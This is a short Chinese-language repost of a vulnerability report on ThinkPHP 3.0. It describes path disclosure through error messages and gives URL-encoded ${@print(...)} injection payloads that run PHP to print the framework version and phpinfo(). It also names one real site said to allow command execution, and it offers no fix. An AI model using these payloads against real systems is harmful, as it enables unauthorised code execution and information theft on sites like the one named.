• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    thinkphp 3.0 爆路径

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    1. thinkphp3.0 模块加载失败,涛涛电脑知识网,出错信息爆应用程序路径。
    漏洞证明:检测有两种情况
     
    1. 可执行命令,涛涛电脑知识网,这个估计是伪3.0版本?
     
    交大定票
     
    此站到可以执行命令
    $%7B@print(THINK_VERSION)%7D
    可查看版本
    $%7B@print(phpinfo())%7D
    可查看phpinfo信息
     
    2. 不可执行命令,爆路径
    $%7B@print(phpinfo())%7D
     
     



    $%7B@print(THINK_VERSION)%7D
     
     
     


    $%7B@print(THINK_VERSION)%7D
     
     
     


     
    修复方案:

    这个不知道咋修复~~~
    作者 dyun

  • 上一篇:防范SQL Server注入攻击
  • 下一篇:IdeaCMS XDAY及修复
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1